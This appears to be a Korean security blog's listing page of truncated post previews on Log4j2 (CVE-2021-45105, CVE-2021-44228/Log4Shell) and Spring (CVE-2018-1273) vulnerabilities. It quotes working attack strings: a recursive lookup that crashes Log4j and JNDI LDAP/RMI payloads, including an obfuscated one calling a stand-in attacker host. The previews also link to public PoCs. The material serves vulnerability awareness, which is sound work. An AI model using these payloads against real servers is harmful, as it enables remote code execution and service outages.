반응형

POC 4

취약점) CVE-2021-45105 PoC / Log4j2 취약점 테스트

CVE-2021-45105 PoC / Log4j2 취약점 테스트 CVE-2021-45105 공개 후 해당 취약점에 대한 PoC도 github에 공개되었습니다. 핵심 공격 구문은 ${${::-${::-$${::-$}}}} 입니다. 보안공지 및 기사를 확인했을때 공격자가 'X-Api-Version' 헤더에 특정 문자열(${${::-${::-$${::-$}}}})을 포함한 요청을 대상 서버에 전송하는 경우, log4j에서 로그를 저장하는 과정에서 StackOverFlow 오류를 발생시켜 해당 프로세스가 종료될 수 있다고 합니다. * PoC 테스트 (모바일 환경에서 이미지 확인이 어려울 수 있습니다) - 제공된 환경에서 테스트시 "Infinite loop in Property ....." 란 에러메시지를 출력합..

[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228) PoC 및 취약점 스캐너

Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너 * 공격 구문 형식 - 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z} - HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격) - 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능. ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} - 출처 : https://github.com/Puliczek/..

취약점 ) CVE-2018-1273 Spring Remote code execution

CVE 취약점 코드 CVE-2018-1273 Vendor Pivotal - Spring Framework 취약점 요약 Spring Data Common의 특정 버전에서 binding 관련 취약점 존재. 악의적인 사용자는 조작된 HTTP 매개변수를 전달하여 원격 코드 실행 공격 가능. 영향받는 버전 * Spring Data Commons 1.13 ~ 1.13.10 * Spring Data REST 2.6 ~ 2.6.10 * Spring Data Commons 2.0 ~ 2.0.5 * Srping Data REST 3.0 ~ 3.0.5 POC https://github.com/wearearima/poc-cve-2018-1273 wearearima/poc-cve-2018-1273 POC for CVE-2018..

반응형